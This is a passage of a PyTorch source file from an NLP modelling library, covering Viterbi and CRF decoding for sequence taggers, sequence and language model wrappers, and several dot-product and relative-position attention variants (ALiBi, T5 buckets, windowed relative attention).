best_path = torch.cat([best_path, best_tag_id.unsqueeze(0)], -1)
new_path_vec = best_path.flip(0)
return new_path_vec[1:], path_score
class ViterbiLogSoftmaxNormBatchSize1(nn.Module):
def __init__(self, start_idx: int, end_idx: int):
super().__init__()
self.start_idx = start_idx
self.end_idx = end_idx
def forward(self, unary: torch.Tensor, trans: torch.Tensor, _: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
unary = unary.squeeze(1)
trans = trans.squeeze(0)
path, score = script_viterbi_log_softmax_norm(unary, trans, self.start_idx, self.end_idx)
return path.unsqueeze(1), score
class ViterbiLogSoftmaxNorm(Viterbi):
def forward(
self, unary: torch.Tensor, trans: torch.Tensor, lengths: torch.Tensor
) -> Tuple[torch.Tensor, torch.Tensor]:
"""Do Viterbi decode on a batch.
:param unary: torch.FloatTensor: [T, B, N]
:param trans: torch.FloatTensor: [1, N, N]
:param norm: Callable: This function should take the initial and a dim to
normalize along.
:return: torch.LongTensor: [T, B] the padded paths
:return: torch.FloatTensor: [B] the path scores
"""
seq_len, batch_size, tag_size = unary.size()
min_length = torch.min(lengths)
backpointers = []
# Alphas: [B, 1, N]
alphas = torch.full((batch_size, 1, tag_size), -1e4, device=unary.device)
alphas[:, 0, self.start_idx] = 0
alphas = F.log_softmax(alphas, dim=-1)
for i, unary_t in enumerate(unary):
next_tag_var = alphas + trans
viterbi, best_tag_ids = torch.max(next_tag_var, 2)
backpointers.append(best_tag_ids)
new_alphas = viterbi + unary_t
new_alphas.unsqueeze_(1)
if i >= min_length:
mask = (i < lengths).view(-1, 1, 1)
alphas = alphas.masked_fill(mask, 0) + new_alphas.masked_fill(mask == MASK_FALSE, 0)
else:
alphas = new_alphas
# Add end tag
terminal_var = alphas.squeeze(1) + trans[:, self.end_idx, :]
path_score, best_tag_id = torch.max(terminal_var, 1)
# Flip lengths
rev_len = seq_len - lengths - 1
best_path = [best_tag_id]
for i in range(len(backpointers)):
t = len(backpointers) - i - 1
backpointer_t = backpointers[t]
# Get new best tag candidate
new_best_tag_id = backpointer_t.gather(1, best_tag_id.unsqueeze(1)).squeeze(1)
# We are going backwards now, if flipped length was passed
# these you aren't in your real results yet
mask = i > rev_len
best_tag_id = best_tag_id.masked_fill(mask, 0) + new_best_tag_id.masked_fill(mask == MASK_FALSE, 0)
best_path.append(best_tag_id)
_ = best_path.pop()
best_path.reverse()
best_path = torch.stack(best_path)
# Mask out the extra tags (This might be pointless given that anything that
# will use this as a dense tensor downstream will mask it itself?)
seq_mask = sequence_mask(lengths, seq_len).to(best_path.device).transpose(0, 1)
best_path = best_path.masked_fill(seq_mask == MASK_FALSE, 0)
return best_path, path_score
def ident(x):
return x
class TaggerGreedyDecoder(nn.Module):
def __init__(
self,
num_tags: int,
constraint_mask: Optional[torch.Tensor] = None,
batch_first: bool = True,
reduction: str = "batch",
):
"""A Greedy decoder and loss module for taggers.
:param num_tags: `int` The number of output classes
:param constraint_mask: `Tensor[1, N, N]` A mask with valid transitions as 1 and invalid as 0
:param batch_first: `bool` Should the batch dimensions be first?
:param reduction: `str` Should the loss be calculated at the token level or batch level
"""
super().__init__()
self.num_tags = num_tags
if constraint_mask is not None:
constraint_mask = F.log_softmax(
torch.zeros(constraint_mask.shape).masked_fill(constraint_mask, -1e4), dim=1
)
self.register_buffer("constraint_mask", constraint_mask)
else:
self.constraint_mask = None
# FIXME: we cant do it like this if using TorchScript
self.to_batch_first = ident if batch_first else tbh2bth
self.to_time_first = bth2tbh if batch_first else ident
self.batch_first = batch_first
self.loss = SequenceLoss(LossFn=nn.CrossEntropyLoss, avg=reduction)
self.viterbi = ViterbiLogSoftmaxNorm(Offsets.GO, Offsets.EOS)
@property
def transitions(self):
return self.constraint_mask
def neg_log_loss(self, inputs, tags, lengths):
unaries = self.to_batch_first(inputs)
tags = self.to_batch_first(tags)
return self.loss(unaries, tags)
def forward(self, inputs) -> torch.Tensor:
unaries, lengths = tensor_and_lengths(inputs)
# If there is a constraint mask do a masked viterbi
if self.constraint_mask is not None:
probv = self.to_time_first(unaries)
probv = F.log_softmax(probv, dim=-1)
preds, scores = self.viterbi(probv, self.constraint_mask, lengths)
if self.batch_first:
return tbh2bth(preds) # , scores
else:
return preds
else:
# Decoding doesn't care about batch/time first
_, preds = torch.max(unaries, -1)
mask = sequence_mask(lengths, unaries.shape[1]).to(preds.device)
# The mask gets generated as batch first
mask = mask if self.batch_first else mask.transpose(0, 1)
preds = preds.masked_fill(mask == MASK_FALSE, 0)
return preds # , None
def extra_repr(self) -> str:
str_ = f"n_tags={self.num_tags}, batch_first={self.batch_first}"
if self.constraint_mask is not None:
str_ += ", constrained=True"
return str_
class CRF(nn.Module):
def __init__(
self,
num_tags: int,
constraint_mask: Optional[torch.Tensor] = None,
batch_first: bool = True,
idxs: Tuple[int, int] = (Offsets.GO, Offsets.EOS),
):
"""Initialize the object.
:param num_tags: int, The number of tags in your output (emission size)
:param constraint: torch.ByteTensor, Constraints on the transitions [1, N, N]
:param idxs: Tuple(int. int), The index of the start and stop symbol
in emissions.
:param batch_first: bool, if the input [B, T, ...] or [T, B, ...]
Note:
if idxs is none then the CRF adds these symbols to the emission
vectors and n_tags is assumed to be the number of output tags.
if idxs is not none then the first element is assumed to be the
start index and the second idx is assumed to be the end index. In
this case n_tags is assumed to include the start and end symbols.
"""
super().__init__()
self.start_idx, self.end_idx = idxs
self.num_tags = num_tags
if constraint_mask is not None:
self.register_buffer("constraint_mask", constraint_mask)
else:
self.constraint_mask = None
self.transitions_p = nn.Parameter(torch.Tensor(1, self.num_tags, self.num_tags).zero_())
self.batch_first = batch_first
self.viterbi = Viterbi(self.start_idx, self.end_idx)
def extra_repr(self) -> str:
str_ = "n_tags=%d, batch_first=%s" % (self.num_tags, self.batch_first)
if self.constraint_mask is not None:
str_ += ", constrained=True"
return str_
@property
def transitions(self):
if self.constraint_mask is not None:
return self.transitions_p.masked_fill(self.constraint_mask, -1e4)
return self.transitions_p
def neg_log_loss(self, unary, tags, lengths):
"""Neg Log Loss with a Batched CRF.
:param unary: torch.FloatTensor: [T, B, N] or [B, T, N]
:param tags: torch.LongTensor: [T, B] or [B, T]
:param lengths: torch.LongTensor: [B]
:return: torch.FloatTensor: [B]
"""
# Convert from [B, T, N] -> [T, B, N]
if self.batch_first:
unary = unary.transpose(0, 1)
tags = tags.transpose(0, 1)
_, batch_size, _ = unary.size()
fwd_score = self._forward_alg(unary, lengths)
gold_score = self.score_sentence(unary, tags, lengths)
loss = fwd_score - gold_score
batch_loss = torch.mean(loss)
return batch_loss
def score_sentence(self, unary: torch.Tensor, tags: torch.Tensor, lengths: torch.Tensor) -> torch.Tensor:
"""Score a batch of sentences.
:param unary: torch.FloatTensor: [T, B, N]
:param tags: torch.LongTensor: [T, B]
:param lengths: torch.LongTensor: [B]
:param min_length: torch.LongTensor: []
:return: torch.FloatTensor: [B]
"""
batch_size = lengths.shape[0]
assert lengths.shape[0] == unary.shape[1]
trans = self.transitions.squeeze(0) # [N, N]
start = torch.full((1, batch_size), self.start_idx, dtype=tags.dtype, device=tags.device) # [1, B]
tags = torch.cat([start, tags], 0) # [T + 1, B]
# Unfold gives me all slices of size 2 (this tag next tag) from dimension T
tag_pairs = tags.unfold(0, 2, 1)
# Move the pair dim to the front and split it into two
indices = tag_pairs.permute(2, 0, 1).chunk(2)
trans_score = trans[[indices[1], indices[0]]].squeeze(0)
# Pull out the values of the tags from the unary scores.
unary_score = unary.gather(2, tags[1:].unsqueeze(-1)).squeeze(-1)
mask = sequence_mask(lengths).transpose(0, 1).to(tags.device)
scores = unary_score + trans_score
scores = scores.masked_fill(mask == MASK_FALSE, 0)
scores = scores.sum(0)
eos_scores = trans[self.end_idx, tags.gather(0, lengths.unsqueeze(0)).squeeze(0)]
scores = scores + eos_scores
return scores
def _forward_alg(self, unary: torch.Tensor, lengths: torch.Tensor) -> torch.Tensor:
"""For CRF forward on a batch.
:param unary: torch.FloatTensor: [T, B, N]
:param lengths: torch.LongTensor: [B]
:return: torch.FloatTensor: [B]
"""
# alphas: [B, 1, N]
min_length = torch.min(lengths)
batch_size = lengths.shape[0]
lengths.shape[0] == unary.shape[1]
alphas = torch.full((batch_size, 1, self.num_tags), -1e4, device=unary.device)
alphas[:, 0, self.start_idx] = 0.0
# alphas.requires_grad = True
trans = self.transitions # [1, N, N]
for i, unary_t in enumerate(unary):
# unary_t: [B, N]
unary_t = unary_t.unsqueeze(2) # [B, N, 1]
# Broadcast alphas along the rows of trans
# Broadcast trans along the batch of alphas
# [B, 1, N] + [1, N, N] -> [B, N, N]
# Broadcast unary_t along the cols of result
# [B, N, N] + [B, N, 1] -> [B, N, N]
scores = alphas + trans + unary_t
new_alphas = vec_log_sum_exp(scores, 2).transpose(1, 2)
# If we haven't reached your length zero out old alpha and take new one.
# If we are past your length, zero out new_alpha and keep old one.
if i >= min_length:
mask = (i < lengths).view(-1, 1, 1)
alphas = alphas.masked_fill(mask, 0) + new_alphas.masked_fill(mask == MASK_FALSE, 0)
else:
alphas = new_alphas
terminal_vars = alphas + trans[:, self.end_idx]
alphas = vec_log_sum_exp(terminal_vars, 2)
return alphas.view(batch_size)
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
unary, lengths = inputs
if self.training:
if self.batch_first:
unary = unary.transpose(0, 1)
forward = self._forward_alg(unary, lengths)
# if self.batch_first:
# forward = forward.transpose(0, 1)
return forward
with torch.no_grad():
return self.decode(unary, lengths)[0]
@jit.export
def decode(self, unary: torch.Tensor, lengths: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""Do Viterbi decode on a batch.
:param unary: torch.FloatTensor: [T, B, N] or [B, T, N]
:param lengths: torch.LongTensor: [B]
:return: torch.LongTensor: [B] the paths
:return: torch.FloatTensor: [B] the path score
"""
if self.batch_first:
unary = unary.transpose(0, 1)
trans = self.transitions # [1, N, N]
path, score = self.viterbi(unary, trans, lengths)
if self.batch_first:
path = path.transpose(0, 1)
return path, score
class SequenceModel(nn.Module):
def __init__(self, nc: int, embeddings: nn.Module, transducer: nn.Module, decoder: Optional[nn.Module] = None):
super().__init__()
self.embed_model = embeddings
self.transducer_model = transducer
# TODO: make this a separate model!
if transducer.output_dim != nc:
self.proj_layer = Dense(transducer.output_dim, nc)
else:
self.proj_layer = nn.Identity()
self.decoder_model = decoder
def transduce(self, inputs: Dict[str, torch.Tensor]) -> torch.Tensor:
lengths = inputs["lengths"]
embedded = self.embed_model(inputs)
embedded = (embedded, lengths)
# transduced = self.transducer_model(embedded)
transduced = self.proj_layer(self.transducer_model(embedded))
return transduced
def decode(self, transduced: torch.Tensor, lengths: torch.Tensor) -> torch.Tensor:
return self.decoder_model((transduced, lengths))
def forward(self, inputs: Dict[str, torch.Tensor]) -> torch.Tensor:
pass
class TagSequenceModel(SequenceModel):
def __init__(self, nc: int, embeddings: nn.Module, transducer: nn.Module, decoder: Optional[nn.Module] = None):
decoder_model = CRF(nc, batch_first=True) if decoder is None else decoder
super().__init__(nc, embeddings, transducer, decoder_model)
def neg_log_loss(self, unary: torch.Tensor, tags: torch.Tensor, lengths: torch.Tensor) -> torch.Tensor:
return self.decoder_model.neg_log_loss(unary, tags, lengths)
def forward(self, inputs: Dict[str, torch.Tensor]) -> torch.Tensor:
transduced = self.transduce(inputs)
path = self.decode(transduced, inputs["lengths"])
return path
class LangSequenceModel(nn.Module):
def __init__(
self,
nc: int,
embeddings: nn.Module,
transducer: nn.Module,
decoder: Optional[nn.Module] = None,
name: Optional[str] = None,
):
super().__init__()
self.embed_model = embeddings
self.transducer_model = transducer
if hasattr(transducer, "requires_state") and transducer.requires_state:
self._call = self._call_with_state
self.requires_state = True
else:
self._call = self._call_without_state
self.requires_state = False
self.output_layer = nn.Linear(self.transducer_model.output_dim, nc)
self.decoder_model = decoder
def forward(self, inputs: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, Optional[torch.Tensor]]:
return self._call(inputs)
def _call_with_state(self, inputs: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, Optional[torch.Tensor]]:
h = inputs["h"]
embedded = self.embed_model(inputs)
transduced, hidden = self.transducer_model((embedded, h))
transduced = self.output_layer(transduced)
return transduced, hidden
def _call_without_state(self, inputs: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, Optional[torch.Tensor]]:
embedded = self.embed_model(inputs)
transduced = self.transducer_model((embedded, None))
transduced = self.output_layer(transduced)
return transduced, None
def pytorch_embedding(weights: torch.Tensor, finetune: bool = True) -> nn.Embedding:
"""Creation function for making an nn.Embedding with the given weights
:param weights: The weights to use
:param finetune: Should we fine-tune the embeddings or freeze them
"""
lut = nn.Embedding(weights.shape[0], weights.shape[1], padding_idx=Offsets.PAD)
del lut.weight
lut.weight = nn.Parameter(torch.FloatTensor(weights), requires_grad=finetune)
return lut
def subsequent_mask(size: int):
"""
Creates a lower triangular mask to mask future
:param size: Temporal length
:return: A tensor of type `uint8` that is 1s along diagonals and below, zero o.w
"""
attn_shape = (1, 1, size, size)
sub_mask = np.tril(np.ones(attn_shape)).astype("uint8")
return torch.from_numpy(sub_mask)
class SequenceSequenceAttention(nn.Module):
def __init__(self, hsz: int = None, pdrop: float = 0.1, **kwargs):
super().__init__()
self.hsz = hsz
self.dropout = nn.Dropout(pdrop)
self.attn = None
def forward(self, qkvm: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
query, key, value, mask = qkvm
a = self._attention(query, key, mask)
self.attn = a
a = self.dropout(a)
return self._update(a, value)
def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
pass
def _update(self, a: torch.Tensor, value: torch.Tensor) -> torch.Tensor:
"""Attention weights are applied for each value, but in a series of efficient matrix operations.
In the case of self-attention, the key and query (used to create the attention weights)
and values are all low order projections of the same input.
:param a: The attention weights [B, H, T_q, T_k]
:param values: The values [B, H, T_k, D]
:returns: A tensor of shape [B, H, T_q, D]
"""
return torch.matmul(a, value)
class SeqScaledDotProductAttention(SequenceSequenceAttention):
def __init__(self, pdrop: float = 0.1, **kwargs):
super().__init__(pdrop=pdrop, **kwargs)
def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
"""Scaled dot product attention, as defined in https://arxiv.org/abs/1706.03762
We apply the query to the keys to receive our weights via softmax in a series of efficient
matrix operations. In the case of self-attention the key and query are all low order
projections of the same input.
:param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
:param key: a set of keys from encoder or self
:param mask: masking (for destination) to prevent seeing what we shouldnt
:return: A tensor that is (BxHxTxT)
"""
# (., H, T_q, T_k) = (., H, T_q, D) x (., H, D, T_k)
d_k = query.size(-1)
scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)
if mask is not None:
scores = scores.masked_fill(mask == MASK_FALSE, -1e9) # [B, 1, 1, T_k] broadcast to [B, 1, T_q, T_k]
return F.softmax(scores, dim=-1)
class SeqScaledDotProductAttentionALiBi(SequenceSequenceAttention):
def __init__(self, pdrop: float = 0.1, num_heads=None, **kwargs):
super().__init__(pdrop=pdrop, **kwargs)
self.num_heads = num_heads
slopes = torch.tensor(get_alibi_slopes(self.num_heads))
self.register_buffer("slopes", slopes)
def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
"""Attention with Linear Biases, defined in https://arxiv.org/pdf/2108.12409.pdf
:param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
:param key: a set of keys from encoder or self
:param mask: masking (for destination) to prevent seeing what we shouldnt
:return: A tensor that is (BxHxTxT)
"""
# (., H, T_q, T_k) = (., H, T_q, D) x (., H, D, T_k)
d_k = query.size(-1)
scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)
T_k = scores.shape[-1]
T_q = scores.shape[-2]
offsets = - torch.abs(torch.arange(T_q).view(-1, 1) - torch.arange(T_k).view(1, -1)).to(self.slopes.device) # [T_q, T_k]
alibi = self.slopes.unsqueeze(-1).unsqueeze(-1) * offsets.unsqueeze(0) # [H, T_q, T_k]
alibi = alibi.unsqueeze(0) # [1, H, T_q, T_k]
scores += alibi
if mask is not None:
scores = scores.masked_fill(mask == MASK_FALSE, -1e9) # [B, 1, 1, T_k] broadcast to [B, 1, T_q, T_k]
return F.softmax(scores, dim=-1)
class SeqScaledDotProductAttentionT5(SequenceSequenceAttention):
def __init__(self, pdrop: float = 0.1, num_heads=None, bidirectional=True, num_buckets=32, max_distance=128, **kwargs):
super().__init__(pdrop=pdrop, **kwargs)
self.num_heads = num_heads
self.bidirectional = bidirectional
self.num_buckets = num_buckets
self.max_distance = max_distance
rel_embedding = torch.nn.init.kaiming_normal_(torch.empty((self.num_heads, self.num_buckets),
dtype=torch.float), nonlinearity='linear')
self.rel_embedding = nn.Parameter(rel_embedding, requires_grad=True)
def _relative_position_bucket(self, relative_position):
"""Taken from https://github.com/tensorflow/mesh/blob/bbb6ce7917e2a8ef1f3dc6990fcacd4f3b075acd/mesh_tensorflow/transformer/transformer_layers.py#L1014
"""
ret = 0
n = -relative_position
num_buckets = self.num_buckets
if self.bidirectional:
num_buckets //= 2
ret += torch.lt(n, 0).to(dtype=torch.long) * num_buckets
n = torch.abs(n).to(dtype=torch.long)
else:
n = torch.maximum(n, 0).to(dtype=torch.long)
# now n is in the range [0, inf)
max_exact = num_buckets // 2
is_small = torch.lt(n, max_exact)
val_if_large = max_exact + (
torch.log(n.to(dtype=torch.float32) / max_exact)
/ math.log(self.max_distance / max_exact) * (num_buckets - max_exact)).to(dtype=torch.long)
val_if_large = torch.minimum(val_if_large, torch.tensor(num_buckets - 1))
ret += torch.where(is_small, n, val_if_large)
return ret
def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
"""Relative Attention described in https://arxiv.org/abs/1910.10683
:param query: a query for alignment.
:param key: a set of keys from encoder or self
:param mask: masking (for destination) to prevent seeing what we shouldnt
:return: A tensor that is (BxHxTxT)
"""
# (., H, T_q, T_k) = (., H, T_q, D) x (., H, D, T_k)
d_k = query.size(-1)
scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)
T_k = scores.shape[-1]
T_q = scores.shape[-2]
memory_position = torch.arange(T_k).view(1, -1)
query_position = torch.arange(T_q).view(-1, 1)
relative_position = memory_position - query_position
rp_bucket = self._relative_position_bucket(relative_position)
relative_attention_bias = self.rel_embedding[:, rp_bucket]
scores += relative_attention_bias
if mask is not None:
scores = scores.masked_fill(mask == MASK_FALSE, -1e9) # [B, 1, 1, T_k] broadcast to [B, 1, T_q, T_k]
return F.softmax(scores, dim=-1)
class SeqDotProductAttention(SequenceSequenceAttention):
def __init__(self, pdrop: float = 0.1, **kwargs):
super().__init__(pdrop=pdrop, **kwargs)
def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
scores = torch.matmul(query, key.transpose(-2, -1))
if mask is not None:
scores = scores.masked_fill(mask == MASK_FALSE, -1e9)
return F.softmax(scores, dim=-1)
class SeqDotProductAttentionALiBi(SequenceSequenceAttention):
def __init__(self, pdrop: float = 0.1, num_heads=None, **kwargs):
super().__init__(pdrop=pdrop, **kwargs)
self.num_heads = num_heads
slopes = torch.tensor(get_alibi_slopes(self.num_heads))
self.register_buffer("slopes", slopes)
def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
scores = torch.matmul(query, key.transpose(-2, -1))
T_k = scores.shape[-1]
T_q = scores.shape[-2]
offsets = - torch.abs(torch.arange(T_q).view(1, -1) - torch.arange(T_k).view(-1, 1)).to(self.slopes.device) # [T_q, T_k]
alibi = self.slopes.unsqueeze(-1).unsqueeze(-1) * offsets.unsqueeze(0) # [H, T_q, T_k]
alibi = alibi.unsqueeze(0) # [1, H, T_q, T_k]
scores += alibi
if mask is not None:
scores = scores.masked_fill(mask == MASK_FALSE, -1e9)
return F.softmax(scores, dim=-1)
class SeqDotProductAttentionT5(SequenceSequenceAttention):
def __init__(self, pdrop: float = 0.1, num_heads=None, bidirectional=True, num_buckets=32, max_distance=128, **kwargs):
super().__init__(pdrop=pdrop, **kwargs)
self.num_heads = num_heads
self.bidirectional = bidirectional
self.num_buckets = num_buckets
self.max_distance = max_distance
rel_embedding = torch.nn.init.kaiming_normal_(torch.empty((self.num_heads, self.num_buckets),
dtype=torch.float), nonlinearity='linear')
self.rel_embedding = nn.Parameter(rel_embedding, requires_grad=True)
def _relative_position_bucket(self, relative_position):
"""Taken from https://github.com/tensorflow/mesh/blob/bbb6ce7917e2a8ef1f3dc6990fcacd4f3b075acd/mesh_tensorflow/transformer/transformer_layers.py#L1014
"""
ret = 0
n = -relative_position
num_buckets = self.num_buckets
if self.bidirectional:
num_buckets //= 2
ret += torch.lt(n, 0).to(dtype=torch.long) * num_buckets
n = torch.abs(n).to(dtype=torch.long)
else:
n = torch.maximum(n, 0).to(dtype=torch.long)
# now n is in the range [0, inf)
max_exact = num_buckets // 2
is_small = torch.lt(n, max_exact)
val_if_large = max_exact + (
torch.log(n.to(dtype=torch.float32) / max_exact)
/ math.log(self.max_distance / max_exact) * (num_buckets - max_exact)).to(dtype=torch.long)
val_if_large = torch.minimum(val_if_large, torch.tensor(num_buckets - 1))
ret += torch.where(is_small, n, val_if_large)
return ret
def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
"""Relative Attention described in https://arxiv.org/abs/1910.10683
:param query: a query for alignment.
:param key: a set of keys from encoder or self
:param mask: masking (for destination) to prevent seeing what we shouldnt
:return: A tensor that is (BxHxTxT)
"""
# (., H, T_q, T_k) = (., H, T_q, D) x (., H, D, T_k)
scores = torch.matmul(query, key.transpose(-2, -1))
T_k = scores.shape[-1]
T_q = scores.shape[-2]
memory_position = torch.arange(T_k).view(1, -1)
query_position = torch.arange(T_q).view(-1, 1)
relative_position = memory_position - query_position
rp_bucket = self._relative_position_bucket(relative_position)
relative_attention_bias = self.rel_embedding[:, rp_bucket]
scores += relative_attention_bias
if mask is not None:
scores = scores.masked_fill(mask == MASK_FALSE, -1e9) # [B, 1, 1, T_k] broadcast to [B, 1, T_q, T_k]
return F.softmax(scores, dim=-1)
class SequenceSequenceRelativeAttention(nn.Module):
"""This form of attention is specified in Shaw et al 2018: https://www.aclweb.org/anthology/N18-2074.pdf
"""
def __init__(self, hsz: int = None, pdrop: float = 0.1, **kwargs):
super().__init__()
self.hsz = hsz
self.dropout = nn.Dropout(pdrop)
self.attn = None
def forward(
self, q_k_v_ek_ev_m: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]
) -> torch.Tensor:
"""Take in a tuple of tensors corresponding to the query, key, value, edges_key, edges_value and mask variables
:param q_k_v_ek_ev_m: A tuple consisting of query, key, value, `edges_key`, `edges_value` and `mask` respectively
:return: An updated value Tensor
"""
query, key, value, edges_key, edges_value, mask = q_k_v_ek_ev_m
a = self._attention(query, key, edges_key, mask)
self.attn = a
a = self.dropout(a)
return self._update(a, value, edges_value)
def _attention(
self, query: torch.Tensor, key: torch.Tensor, edges_key: torch.Tensor, mask: Optional[torch.Tensor] = None
) -> torch.Tensor:
pass
def _update(self, a: torch.Tensor, value: torch.Tensor, edges_value: torch.Tensor) -> torch.Tensor:
"""Attention weights are applied for each value, but in a series of efficient matrix operations.
In the case of self-attention, the key and query (used to create the attention weights)
and values are all low order projections of the same input.
:param a: The attention weights [B, H, T_q, T_k]
:param value: The values [B, H, T_k, D]
:param edge_value: The edge values [T_q, T_k, D]
:returns: A tensor of shape [B, H, T, D]
"""
B, H, T_k, D = value.shape
updated_values = torch.matmul(a, value) # [B, H, T_q, D]
if edges_value is not None:
a = a.view(B * H, -1, T_k).transpose(0, 1) # (T_q, BxH, T_k)
t = torch.matmul(a, edges_value) # (T_q, BxH, D)
update_edge_values = t.transpose(0, 1).view(B, H, -1, D)
return updated_values + update_edge_values
else:
return updated_values
class SeqScaledDotProductRelativeAttention(SequenceSequenceRelativeAttention):
def __init__(self, pdrop: float = 0.1, **kwargs):
super().__init__(pdrop=pdrop, **kwargs)
def _attention(
self, query: torch.Tensor, key: torch.Tensor, edges_key: torch.Tensor, mask: Optional[torch.Tensor] = None
) -> torch.Tensor:
"""Scaled dot product attention, as defined in https://arxiv.org/abs/1706.03762
We apply the query to the keys to receive our weights via softmax in a series of efficient
matrix operations. In the case of self-attntion the key and query are all low order
projections of the same input.
:param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
:param key: a set of keys from encoder or self
:param mask: masking (for destination) to prevent seeing what we shouldnt
:param edges_key: a matrix of relative embeddings between each word in a sequence [T_q x T_k x D]
:return: A tensor that is (B x H x T_q x T_k)
"""
B, H, T_q, d_k = query.shape # (., H, T_q, T_k) = (., H, T_q, D) x (., H, D, T_k)
scores_qk = torch.matmul(query, key.transpose(-2, -1))
tbhd = query.reshape(B * H, T_q, d_k).transpose(0, 1) # [T_q, B*H, d_k]
scores_qek = torch.matmul(tbhd, edges_key.transpose(-2, -1)) # [T_q, B*H, T_k]
scores_qek = scores_qek.transpose(0, 1).view(B, H, T_q, -1) # [B, H, T_q, T_k]
scores = (scores_qk + scores_qek) / math.sqrt(d_k)
# only for cross-attention T_q != T_k. for such case, mask should be src_mask, which is a sequence_mask with
# dimension [B, 1, 1, T_k], and will be broadcast to dim of scores:
if mask is not None:
scores = scores.masked_fill(mask == MASK_FALSE, -1e9)
return F.softmax(scores, dim=-1)
class SeqDotProductRelativeAttention(SequenceSequenceRelativeAttention):
def __init__(self, pdrop: float = 0.1, **kwargs):
super().__init__(pdrop=pdrop, **kwargs)
def _attention(
self, query: torch.Tensor, key: torch.Tensor, edges_key: torch.Tensor, mask: Optional[torch.Tensor] = None
) -> torch.Tensor:
B, H, T_q, d_k = query.shape
scores_qk = torch.matmul(query, key.transpose(-2, -1))
tbhd = query.reshape(B * H, T_q, d_k).transpose(0, 1)
scores_qek = torch.matmul(tbhd, edges_key.transpose(-2, -1))
scores_qek = scores_qek.transpose(0, 1).view(B, H, T_q, -1)
scores = scores_qk + scores_qek
if mask is not None:
scores = scores.masked_fill(mask == MASK_FALSE, -1e9)
return F.softmax(scores, dim=-1)
def unfold_tensor(tensor, dim, window_sz):
"""Unfold a tensor by applying a sliding window on a certain dimension with step 1 and padding of 0's. The window
dimension is added as the last dimension
:param tensor: the tensor to be unfolded, with shape [d_1, d_2, ..., T, ..., d_n]
:param dim: the dimension along which unfolding is applied
:param window_sz: sliding window size, need to be an odd number
:return: the unfolded tensor with shape [d_1, d_2, ..., T, ..., d_n, window_sz]
"""
half_window = (window_sz - 1) // 2
if dim < 0:
dim = len(tensor.shape) + dim
# torch.nn.functional.pad apply backwardly from the last dimension
padding = [0, 0] * (len(tensor.shape) - dim - 1) + [half_window, half_window]
return F.pad(tensor, padding).unfold(dim, window_sz, 1)
class SeqScaledWindowedRelativeAttention(SequenceSequenceRelativeAttention):
"""This class implements windowed relative attention, i.e. preventing attention beyond rpr_k. For efficiency,
_attention and _update are implemented in a different way."""
def __init__(self, pdrop: float = 0.1, **kwargs):
super().__init__(pdrop=pdrop, **kwargs)
def _unfold_mask(self, mask, batchsz, rpr_k):
"""Transform mask into the unfolded format."""
window_sz = 2 * rpr_k + 1
T = mask.shape[3]
if mask.shape[2] > 1: # mask is from a subsequent mask, with [1, 1, T, T] or [B, 1, T, T]
logger.warning("Using subsequent mask with long sequence may cause OOM error.")
mask = mask.expand(batchsz, 1, T, T) # expand sequence/subsequent mask into a uniform dim
mask = F.pad(mask, [rpr_k, rpr_k]) # pad both sides with rpr_k, [B, 1, T, T + 2*rpr_k]
seq = torch.arange(T + 2 * rpr_k)
indices = seq.unfold(0, window_sz, 1) # indices of a sliding window, [T, W]
indices = indices.unsqueeze(0).unsqueeze(0).expand(batchsz, 1, T, window_sz).to(mask.device)
return torch.gather(mask, -1, indices) # [B, 1, T, W]):
else: # mask is a sequence mask [B, 1, 1, T]
unfolded = unfold_tensor(mask, dim=-1, window_sz=window_sz) # [B, 1, 1, T, W]
return unfolded.squeeze(1) # [B, 1, T, W]
def _attention(
self, query: torch.Tensor, key: torch.Tensor, rpr_key: torch.Tensor, mask: Optional[torch.Tensor] = None
) -> torch.Tensor:
"""Implementation of attention considering RA masking: using torch.Tensor.unfold to create an extra dimension
representing the sliding window. Then when applying matmul, Q, K, V share the same T dimension.
:param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
:param key: a set of keys from encoder or self
:param mask: masking (for destination) to prevent seeing what we shouldnt
:param rpr_key: tensor of the rpr_key embeddings [W, d_k]
:return: A tensor that is [B, H, T, 1, W] to be matmul with values
"""
B, H, T, d_k = query.shape
window_sz = rpr_key.shape[0]
rpr_k = (window_sz - 1) // 2
query = query.unsqueeze(-2) # [B, H, T, 1, d_k]
key = unfold_tensor(key, dim=2, window_sz=window_sz) # [B, H, T, d_k, W]
rpr_key = rpr_key.transpose(0, 1).unsqueeze(0).unsqueeze(0).unsqueeze(0) # [1, 1, 1, d_k, W]
scores_qk = torch.matmul(query, key) # [B, H, T, 1, W]
scores_qrk = torch.matmul(query, rpr_key) # [B, H, T, 1, W]
scores = (scores_qk + scores_qrk) / math.sqrt(d_k)
if mask is not None:
mask = self._unfold_mask(mask, B, rpr_k).unsqueeze(-2) # [B, 1, T, 1, W]
scores = scores.masked_fill(mask == False, -1e9)
return F.softmax(scores, dim=-1)
def _update(self, a: torch.Tensor, value: torch.Tensor, rpr_value: torch.Tensor) -> torch.Tensor:
